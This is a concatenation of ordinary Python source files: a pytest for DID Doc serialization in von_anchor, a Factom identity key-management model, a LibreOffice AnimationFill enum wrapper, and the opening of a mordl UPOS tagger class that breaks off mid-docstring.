'publicKeyPem': '-----BEGIN PUBLIC 9...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': '<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL;0',
'type': 'Agency',
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey']) + 1
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 2 == DID Doc on mixed reference styles, embedded and ref style authn keys: {}'.format(ppjson(dd_out)))
# All references canonical where possible; one authn key embedded and one by reference
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': 'did:sov:<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL;0',
'type': 'DidMessaging',
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey']) + 1
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 3 == DID Doc on canonical refs: {}'.format(ppjson(dd_out)))
# Minimal as per indy-agent test suite without explicit identifiers
dd_in = {
'@context': 'https://w3id.org/did/v1',
'publicKey': [
{
'id': '<KEY>',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'type': 'DidMessaging',
'recipientKeys': ['~<KEY>'],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
dd_out = dd.serialize()
print('\n\n== 4 == DID Doc miminal style, implcit DID document identifier: {}'.format(
ppjson(dd_out)))
# Minimal + ids as per indy-agent test suite with explicit identifiers; novel service recipient key on raw base58
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-1',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 1,
'recipientKeys': ['~YYYYYYYYYYYYYYYY'],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == 1 + len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
dd_out = dd.serialize()
print('\n\n== 5 == DID Doc miminal style plus explicit idents and novel raw base58 service recip key: {}'.format(
ppjson(dd_out)))
# Minimal + ids as per indy-agent test suite with explicit identifiers; novel service recipient key on raw base58
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-1',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
},
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-2',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': '~<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 0,
'recipientKeys': ['~ZZZZZZZZZZZZZZZZ'],
'serviceEndpoint': 'did:sov:LjgpST2rjsoxYegQDRm7EL;1'
},
{
'id': '1',
'type': 'one',
'priority': 1,
'recipientKeys': [
<KEY>',
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-1'
],
'routingKeys': [
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-3'
],
'serviceEndpoint': 'LjgpST2rjsoxYegQDRm7EL;2'
},
{
'id': '2',
'type': 'two',
'priority': 2,
'recipientKeys': [
<KEY>',
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-1'
],
'routingKeys': [
'did:sov:<KEY>'
],
'serviceEndpoint': 'https://www.two.ca/two'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == 1 + len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
assert {s.priority for s in dd.service.values()} == {0, 1, 2}
assert len(dd.service) == 3
dd_out = dd.serialize()
print('\n\n== 6 == DID Doc on mixed service routing and recipient keys: {}'.format(
ppjson(dd_out)))
# Exercise missing service recipient key
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '<KEY>',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 1,
'recipientKeys': [
'did:sov:<KEY>'
],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
try:
dd = DIDDoc.deserialize(dd_in)
assert False
except AbsentDIDDocItem:
pass
print('\n\n== 7 == DID Doc on underspecified service key fails as expected') | test/test_a2a.py | import json
import pytest
from von_anchor.a2a.diddoc import DIDDoc
from von_anchor.error import AbsentDIDDocItem
from von_anchor.frill import Ink, ppjson
@pytest.mark.asyncio
async def test_a2a():
print(Ink.YELLOW('\n\n== Testing DID Doc wranglers =='))
# One authn key by reference
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': '4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
},
{
'id': '6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4'
}
],
'service': [
{
'id': '0',
'type': 'Agency',
'serviceEndpoint': 'did:sov:Q4zqM7aXqm7gDQkUVLng9h'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey'])
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 1 == DID Doc on abbreviated identifiers: {}'.format(ppjson(dd_out)))
# One authn key embedded, all possible refs canonical
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': '<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL;0',
'type': 'Agency',
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey']) + 1
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 2 == DID Doc on mixed reference styles, embedded and ref style authn keys: {}'.format(ppjson(dd_out)))
# All references canonical where possible; one authn key embedded and one by reference
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': 'did:sov:<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL;0',
'type': 'DidMessaging',
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey']) + 1
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 3 == DID Doc on canonical refs: {}'.format(ppjson(dd_out)))
# Minimal as per indy-agent test suite without explicit identifiers
dd_in = {
'@context': 'https://w3id.org/did/v1',
'publicKey': [
{
'id': '<KEY>',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'type': 'DidMessaging',
'recipientKeys': ['~<KEY>'],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
dd_out = dd.serialize()
print('\n\n== 4 == DID Doc miminal style, implcit DID document identifier: {}'.format(
ppjson(dd_out)))
# Minimal + ids as per indy-agent test suite with explicit identifiers; novel service recipient key on raw base58
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-1',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 1,
'recipientKeys': ['~YYYYYYYYYYYYYYYY'],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == 1 + len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
dd_out = dd.serialize()
print('\n\n== 5 == DID Doc miminal style plus explicit idents and novel raw base58 service recip key: {}'.format(
ppjson(dd_out)))
# Minimal + ids as per indy-agent test suite with explicit identifiers; novel service recipient key on raw base58
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-1',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
},
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-2',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': '~<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 0,
'recipientKeys': ['~ZZZZZZZZZZZZZZZZ'],
'serviceEndpoint': 'did:sov:LjgpST2rjsoxYegQDRm7EL;1'
},
{
'id': '1',
'type': 'one',
'priority': 1,
'recipientKeys': [
<KEY>',
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-1'
],
'routingKeys': [
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-3'
],
'serviceEndpoint': 'LjgpST2rjsoxYegQDRm7EL;2'
},
{
'id': '2',
'type': 'two',
'priority': 2,
'recipientKeys': [
<KEY>',
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-1'
],
'routingKeys': [
'did:sov:<KEY>'
],
'serviceEndpoint': 'https://www.two.ca/two'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == 1 + len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
assert {s.priority for s in dd.service.values()} == {0, 1, 2}
assert len(dd.service) == 3
dd_out = dd.serialize()
print('\n\n== 6 == DID Doc on mixed service routing and recipient keys: {}'.format(
ppjson(dd_out)))
# Exercise missing service recipient key
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '<KEY>',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 1,
'recipientKeys': [
'did:sov:<KEY>'
],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
try:
dd = DIDDoc.deserialize(dd_in)
assert False
except AbsentDIDDocItem:
pass
print('\n\n== 7 == DID Doc on underspecified service key fails as expected') | 0.345989 | 0.29088 |
import json
from . import consts
from collections import OrderedDict
from identitykeys import is_valid_idpub, PublicIdentityKey
class IdentityNotFoundException(Exception):
pass
class Identity:
def __init__(self, did, chain_id):
self.did = did
self.chain_id = chain_id
self.active_keys = {}
self.all_keys = OrderedDict()
self.version = 1
self.name = None
self.created_height = None
self.stage = None
def process_creation(self, entry_hash: str, external_ids: list, content: bytes, stage='pending', height=None):
if stage == 'pending':
assert height is None, 'Stage "pending", height must be None'
elif stage in {'anchored', 'factom'}:
assert isinstance(height, int), 'Stage not "pending", height must not be None'
else:
raise ValueError('Invalid stage. Must be "pending", "factom", or "anchored"')
# Verify that this is a actually an Identity Chain
# Rules:
# - ExtID[0] == "IdentityChain"
# - Content is a proper JSON object with 'version' and 'keys' elements
# - All elements of the 'keys' array are valid public keys (idpub format)
if external_ids[0] != consts.IDENTITY_CHAIN_TAG:
raise IdentityNotFoundException()
try:
content_json = json.loads(content.decode())
except json.JSONDecodeError:
raise IdentityNotFoundException()
if content_json.get('version') == 1:
if not isinstance(content_json.get('keys'), list):
raise IdentityNotFoundException()
for i, key in enumerate(content_json['keys']):
if not is_valid_idpub(key):
raise IdentityNotFoundException()
elif key in self.active_keys:
continue
key_object = {
'id': '{}#key-{}'.format(self.did, i),
'controller': self.did,
'type': consts.PUBLIC_KEY_TYPE,
'publicKeyHex': PublicIdentityKey(key_string=key).to_bytes().hex(),
'activatedHeight': height,
'retiredHeight': None,
'priority': i,
'entryHash': entry_hash
}
self.active_keys[key] = key_object
self.all_keys[key] = key_object
else:
raise IdentityNotFoundException()
self.version = content_json.get('version')
self.name = [x.decode() for x in external_ids[1:]]
self.created_height = height
self.stage = stage
def process_key_replacement(self, entry_hash: str, external_ids: list, height: int):
if len(external_ids) != 5 or external_ids[0] != consts.KEY_REPLACEMENT_TAG:
return
old_key = external_ids[1].decode()
new_key = external_ids[2].decode()
signature = external_ids[3]
signer_key = external_ids[4].decode()
# all provided keys must be valid
if not is_valid_idpub(old_key) or not is_valid_idpub(new_key) or not is_valid_idpub(signer_key):
return False
# new_key must never have been active
if new_key in self.all_keys:
return False
# old_key and signer_key must be currently active
if old_key not in self.active_keys or signer_key not in self.active_keys:
return False
# signer_key must be the same (or higher) priority as old_key
old_priority = self.active_keys[old_key]['priority']
if old_priority < self.active_keys[signer_key]['priority']:
return False
# Finally check the signature
message = self.chain_id.encode() + old_key.encode() + new_key.encode()
k = PublicIdentityKey(key_string=signer_key)
if not k.verify(signature, message):
return False
# Key replacement is valid and finalized
self.all_keys[old_key]['retiredHeight'] = height
new_key_object = {
'id': '{}#key-{}'.format(self.did, old_priority),
'controller': self.did,
'type': consts.PUBLIC_KEY_TYPE,
'publicKeyHex': PublicIdentityKey(key_string=new_key).to_bytes().hex(),
'activatedHeight': height,
'retiredHeight': None,
'priority': old_priority,
'entryHash': entry_hash
}
del self.active_keys[old_key]
self.active_keys[new_key] = new_key_object
self.all_keys[new_key] = new_key_object
return True
def get_did_document(self):
key_count = len(self.active_keys)
did_document = {
'@context': consts.DID_CONTEXT,
'id': self.did,
'service': [],
'publicKey': list(self.active_keys.values()),
'authentication': ['{}#key-{}'.format(self.did, key_count - 1)]
}
return did_document
def get_method_metadata(self):
return {
'version': self.version,
'name': self.name,
'createdHeight': self.created_height,
'stage': self.stage,
'publicKeyHistory': list(self.all_keys.values())
} | src/models.py | import json
from . import consts
from collections import OrderedDict
from identitykeys import is_valid_idpub, PublicIdentityKey
class IdentityNotFoundException(Exception):
pass
class Identity:
def __init__(self, did, chain_id):
self.did = did
self.chain_id = chain_id
self.active_keys = {}
self.all_keys = OrderedDict()
self.version = 1
self.name = None
self.created_height = None
self.stage = None
def process_creation(self, entry_hash: str, external_ids: list, content: bytes, stage='pending', height=None):
if stage == 'pending':
assert height is None, 'Stage "pending", height must be None'
elif stage in {'anchored', 'factom'}:
assert isinstance(height, int), 'Stage not "pending", height must not be None'
else:
raise ValueError('Invalid stage. Must be "pending", "factom", or "anchored"')
# Verify that this is a actually an Identity Chain
# Rules:
# - ExtID[0] == "IdentityChain"
# - Content is a proper JSON object with 'version' and 'keys' elements
# - All elements of the 'keys' array are valid public keys (idpub format)
if external_ids[0] != consts.IDENTITY_CHAIN_TAG:
raise IdentityNotFoundException()
try:
content_json = json.loads(content.decode())
except json.JSONDecodeError:
raise IdentityNotFoundException()
if content_json.get('version') == 1:
if not isinstance(content_json.get('keys'), list):
raise IdentityNotFoundException()
for i, key in enumerate(content_json['keys']):
if not is_valid_idpub(key):
raise IdentityNotFoundException()
elif key in self.active_keys:
continue
key_object = {
'id': '{}#key-{}'.format(self.did, i),
'controller': self.did,
'type': consts.PUBLIC_KEY_TYPE,
'publicKeyHex': PublicIdentityKey(key_string=key).to_bytes().hex(),
'activatedHeight': height,
'retiredHeight': None,
'priority': i,
'entryHash': entry_hash
}
self.active_keys[key] = key_object
self.all_keys[key] = key_object
else:
raise IdentityNotFoundException()
self.version = content_json.get('version')
self.name = [x.decode() for x in external_ids[1:]]
self.created_height = height
self.stage = stage
def process_key_replacement(self, entry_hash: str, external_ids: list, height: int):
if len(external_ids) != 5 or external_ids[0] != consts.KEY_REPLACEMENT_TAG:
return
old_key = external_ids[1].decode()
new_key = external_ids[2].decode()
signature = external_ids[3]
signer_key = external_ids[4].decode()
# all provided keys must be valid
if not is_valid_idpub(old_key) or not is_valid_idpub(new_key) or not is_valid_idpub(signer_key):
return False
# new_key must never have been active
if new_key in self.all_keys:
return False
# old_key and signer_key must be currently active
if old_key not in self.active_keys or signer_key not in self.active_keys:
return False
# signer_key must be the same (or higher) priority as old_key
old_priority = self.active_keys[old_key]['priority']
if old_priority < self.active_keys[signer_key]['priority']:
return False
# Finally check the signature
message = self.chain_id.encode() + old_key.encode() + new_key.encode()
k = PublicIdentityKey(key_string=signer_key)
if not k.verify(signature, message):
return False
# Key replacement is valid and finalized
self.all_keys[old_key]['retiredHeight'] = height
new_key_object = {
'id': '{}#key-{}'.format(self.did, old_priority),
'controller': self.did,
'type': consts.PUBLIC_KEY_TYPE,
'publicKeyHex': PublicIdentityKey(key_string=new_key).to_bytes().hex(),
'activatedHeight': height,
'retiredHeight': None,
'priority': old_priority,
'entryHash': entry_hash
}
del self.active_keys[old_key]
self.active_keys[new_key] = new_key_object
self.all_keys[new_key] = new_key_object
return True
def get_did_document(self):
key_count = len(self.active_keys)
did_document = {
'@context': consts.DID_CONTEXT,
'id': self.did,
'service': [],
'publicKey': list(self.active_keys.values()),
'authentication': ['{}#key-{}'.format(self.did, key_count - 1)]
}
return did_document
def get_method_metadata(self):
return {
'version': self.version,
'name': self.name,
'createdHeight': self.created_height,
'stage': self.stage,
'publicKeyHistory': list(self.all_keys.values())
} | 0.625552 | 0.135518 |
from enum import IntEnum
from typing import TYPE_CHECKING
from ooo.oenv.env_const import UNO_ENVIRONMENT, UNO_RUNTIME
_DYNAMIC = False
if (not TYPE_CHECKING) and UNO_RUNTIME and UNO_ENVIRONMENT:
_DYNAMIC = True
if not TYPE_CHECKING and _DYNAMIC:
from com.sun.star.animations import AnimationFill as AnimationFill
if hasattr(AnimationFill, '_constants') and isinstance(AnimationFill._constants, dict):
AnimationFill._constants['__ooo_ns__'] = 'com.sun.star.animations'
AnimationFill._constants['__ooo_full_ns__'] = 'com.sun.star.animations.AnimationFill'
AnimationFill._constants['__ooo_type_name__'] = 'const'
def build_enum():
global AnimationFillEnum
ls = [f for f in dir(AnimationFill) if not callable(getattr(AnimationFill, f)) and not f.startswith('__')]
_dict = {}
for name in ls:
_dict[name] = getattr(AnimationFill, name)
AnimationFillEnum = IntEnum('AnimationFillEnum', _dict)
build_enum()
else:
from ...lo.animations.animation_fill import AnimationFill as AnimationFill
class AnimationFillEnum(IntEnum):
"""
Enum of Const Class AnimationFill
This constants are used for the members fill() and fillDefault() of the an XTimeContainer.
"""
DEFAULT = AnimationFill.DEFAULT
"""
The fill behavior for the element is determined by the value of the XTiming.FillDefault attribute.
This is the default value for the XTiming.Fill... If the application of fillDefault to an element would result in the element having a value of fill that is not allowed on that element, the element will instead have a fill value of AnimationFill.AUTO.
"""
INHERIT = AnimationFill.INHERIT
"""
Specifies that the value of this attribute (and of the fill behavior) are inherited from the XTiming.FillDefault value of the parent element.
If there is no parent element, the value is AnimationFill.AUTO. This is the default value for the XTiming.FillDefault.
"""
REMOVE = AnimationFill.REMOVE
"""
Specifies that the element will not extend past the end of the last instance of the simple duration.
"""
FREEZE = AnimationFill.FREEZE
"""
Specifies that the element will extend past the end of the last instance of the simple duration by \"freezing\" the element state at that point.
The parent time container of the element determines how long the element is frozen (as described immediately below).
"""
HOLD = AnimationFill.HOLD
"""
Setting this to \"hold\" has the same effect as setting to \"freeze\", except that the element is always frozen to extend to the end of the simple duration of the parent time container of the element (independent of the type of time container).
For profiles that support a layered layout model (e.g., SMIL 2.0 Language Profile), held elements (elements with fill=\"hold\") will refresh their display area when a layer is added on top then later removed.
"""
TRANSITION = AnimationFill.TRANSITION
"""
Setting this to \"transition\" has the same effect as setting to \"freeze\", except that the element is removed at the end of the transition.
This value is only allowed on elements with media directly associated with them. If specified on any other element (e.g. a time container element in the SMIL language profile), the attribute is ignored. See the SMIL Transitions module.
"""
AUTO = AnimationFill.AUTO
"""
The fill behavior for this element depends on whether the element specifies any of the attributes that define the simple or active duration:
"""
__all__ = ['AnimationFill', 'AnimationFillEnum'] | ooobuild/dyn/animations/animation_fill.py | from enum import IntEnum
from typing import TYPE_CHECKING
from ooo.oenv.env_const import UNO_ENVIRONMENT, UNO_RUNTIME
_DYNAMIC = False
if (not TYPE_CHECKING) and UNO_RUNTIME and UNO_ENVIRONMENT:
_DYNAMIC = True
if not TYPE_CHECKING and _DYNAMIC:
from com.sun.star.animations import AnimationFill as AnimationFill
if hasattr(AnimationFill, '_constants') and isinstance(AnimationFill._constants, dict):
AnimationFill._constants['__ooo_ns__'] = 'com.sun.star.animations'
AnimationFill._constants['__ooo_full_ns__'] = 'com.sun.star.animations.AnimationFill'
AnimationFill._constants['__ooo_type_name__'] = 'const'
def build_enum():
global AnimationFillEnum
ls = [f for f in dir(AnimationFill) if not callable(getattr(AnimationFill, f)) and not f.startswith('__')]
_dict = {}
for name in ls:
_dict[name] = getattr(AnimationFill, name)
AnimationFillEnum = IntEnum('AnimationFillEnum', _dict)
build_enum()
else:
from ...lo.animations.animation_fill import AnimationFill as AnimationFill
class AnimationFillEnum(IntEnum):
"""
Enum of Const Class AnimationFill
This constants are used for the members fill() and fillDefault() of the an XTimeContainer.
"""
DEFAULT = AnimationFill.DEFAULT
"""
The fill behavior for the element is determined by the value of the XTiming.FillDefault attribute.
This is the default value for the XTiming.Fill... If the application of fillDefault to an element would result in the element having a value of fill that is not allowed on that element, the element will instead have a fill value of AnimationFill.AUTO.
"""
INHERIT = AnimationFill.INHERIT
"""
Specifies that the value of this attribute (and of the fill behavior) are inherited from the XTiming.FillDefault value of the parent element.
If there is no parent element, the value is AnimationFill.AUTO. This is the default value for the XTiming.FillDefault.
"""
REMOVE = AnimationFill.REMOVE
"""
Specifies that the element will not extend past the end of the last instance of the simple duration.
"""
FREEZE = AnimationFill.FREEZE
"""
Specifies that the element will extend past the end of the last instance of the simple duration by \"freezing\" the element state at that point.
The parent time container of the element determines how long the element is frozen (as described immediately below).
"""
HOLD = AnimationFill.HOLD
"""
Setting this to \"hold\" has the same effect as setting to \"freeze\", except that the element is always frozen to extend to the end of the simple duration of the parent time container of the element (independent of the type of time container).
For profiles that support a layered layout model (e.g., SMIL 2.0 Language Profile), held elements (elements with fill=\"hold\") will refresh their display area when a layer is added on top then later removed.
"""
TRANSITION = AnimationFill.TRANSITION
"""
Setting this to \"transition\" has the same effect as setting to \"freeze\", except that the element is removed at the end of the transition.
This value is only allowed on elements with media directly associated with them. If specified on any other element (e.g. a time container element in the SMIL language profile), the attribute is ignored. See the SMIL Transitions module.
"""
AUTO = AnimationFill.AUTO
"""
The fill behavior for this element depends on whether the element specifies any of the attributes that define the simple or active duration:
"""
__all__ = ['AnimationFill', 'AnimationFillEnum'] | 0.667473 | 0.194081 |
from corpuscula import CorpusDict
from junky import get_func_params
from mordl.base_tagger import BaseTagger
from mordl.defaults import BATCH_SIZE, CDICT_COEF_THRESH ,LOG_FILE, \
TRAIN_BATCH_SIZE
from mordl.upos_tagger_model import UposTaggerModel
import time
_CDICT_COEF_THRESH = .99
class UposTagger(BaseTagger):
"""
The UPOS tagger class.
Args:
**field** (`str`; default is `UPOS`): the name of the *CoNLL-U* field,
values of which needs to be predicted. With this tagger, you can predict
only fields with atomicvalues, like UPOS.
**embs** (`dict({str: object}); default is `None`): the `dict` with paths
to embeddings files as keys and corresponding embedding models as values.
If the tagger needs to load any embedding model, firstly, the model is
looked up it in that `dict`.
During init, **embs** is copied to the `embs` attribute of the creating
object, and this attribute may be used further to share already loaded
embeddings with another taggers.
"""
def __init__(self, field='UPOS', embs=None):
super().__init__(embs=embs)
self._field = field
def load(self, name, device=None,
dataset_emb_path=None, dataset_device=None, log_file=LOG_FILE):
"""Loads tagger's internal state saved by its `.save()` method.
Args:
**name** (`str`): the name of the previously saved internal state.
**device** (`str`; default is `None`): the device for the loaded model
if you want to override the value from the config.
**dataset_emb_path** (`str`; default is `None`): the path where the
dataset's embeddings to load from if you want to override the value
from the config.
**dataset_device** (`str`; default is `None`): the device for the
loaded dataset if you want to override the value from the config.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
"""
args, kwargs = get_func_params(UposTagger.load, locals())
super().load(UposTaggerModel, *args, **kwargs)
def _check_cdict(self, sentence, use_cdict_coef):
if use_cdict_coef not in [None, False]:
isfirst = True
for token in sentence[0] if isinstance(sentence, tuple) else \
sentence:
id_, form = token['ID'], token['FORM']
if form and '-' not in id_:
guess, coef = \
self._cdict.predict_tag(form, isfirst=isfirst)
isfirst = False
if coef is not None \
and coef >= (CDICT_COEF_THRESH
if use_cdict_coef is True else
use_cdict_coef):
token['UPOS'] = guess
return sentence
def predict(self, corpus, use_cdict_coef=False, with_orig=False,
batch_size=BATCH_SIZE, split=None, clone_ds=False,
save_to=None, log_file=LOG_FILE):
"""Predicts tags in the UPOS field of the corpus.
Args:
**corpus**: the corpus which will be used for the feature extraction
and predictions. May be either the name of the file in *CoNLL-U*
format or the `list`/`iterator` of sentences in *Parsed CoNLL-U*.
**use_cdict_coef** (`bool` | `float`; default is `False`): if `False`,
we use our prediction only. If `True`, we replace our prediction to
the value returned by the `corpuscula.CorpusDict.predict_<field>()`
method if its `coef` >= `.99`. Also, you can specify your own
threshold as the value of the param.
**with_orig** (`bool`; default is `False`): if `True`, instead of just
the sequence with predicted labels, return the sequence of tuples
